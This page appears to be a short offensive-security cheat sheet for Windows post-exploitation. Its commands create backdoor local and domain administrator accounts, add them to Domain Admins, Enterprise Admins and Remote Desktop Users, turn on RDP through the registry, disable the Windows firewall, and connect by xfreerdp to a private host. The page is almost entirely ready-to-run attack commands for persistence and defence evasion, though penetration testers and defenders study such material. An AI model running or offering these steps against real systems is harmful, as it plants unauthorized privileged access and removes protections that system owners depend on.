>_ shadow.red

Add Admin User and Enable RDP

Privilege Escalation Windows Misc windows

Add local admin

net user hacker password123 /add
net localgroup administrators hacker /add

With RDP group

net localgroup "Remote Desktop Users" hacker /add

Domain admin (if domain joined and we have rights)

net user siren superPassword /add /DOMAIN
net localgroup Administrators siren /ADD /DOMAIN
net group "Domain Admins" siren /ADD /DOMAIN
net group "Enterprise Admins" siren /ADD /DOMAIN

Enable RDP and disable firewall

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
netsh firewall add portopening TCP 3389 "Remote Desktop"

Connect

xfreerdp /u:alexis /p:hacker_123321 /v:10.2.18.93